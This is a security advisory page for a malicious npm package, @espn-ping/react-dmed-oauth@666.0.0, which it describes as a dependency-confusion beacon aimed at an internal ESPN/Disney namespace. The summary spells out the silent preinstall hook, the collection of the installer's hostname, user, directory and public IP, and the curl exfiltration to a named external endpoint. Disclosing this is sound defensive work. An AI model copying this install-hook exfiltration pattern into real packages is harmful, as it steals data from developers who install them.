npm

@espn-ping/react-dmed-oauth @666.0.0

Vulnerability report · Last retrieved from osv.dev July 14, 2026 at 5:45 AM UTC

Malicious

OSV ID

MAL-2026-10401

Ecosystem

npm

Summary

@espn-ping/react-dmed-oauth@666.0.0 declares a preinstall lifecycle script ( node index.js > /dev/null 2>&1 ) that automatically executes on npm install . index.js shells out via child_process.exec to collect the installer's hostname, current working directory, username, and public IP (via curl https://ifconfig.me ), then transmits the encoded data via curl -k GET to https://r.dontvisitmy.website/sendreq.php?newdata=... . Output is suppressed to hide the beacon from the installer's console. The scope @espn-ping and version 666.0.0 are consistent with a dependency-confusion beacon targeting an internal ESPN/Disney namespace.

Source: amazon-inspector (3bc0467ac62043cf22dd249a99ff1279646dc599702140998ff5b86c79645364)

Protect your entire dependency tree

Scan your lock files automatically on every PR. Block malicious packages before they reach production.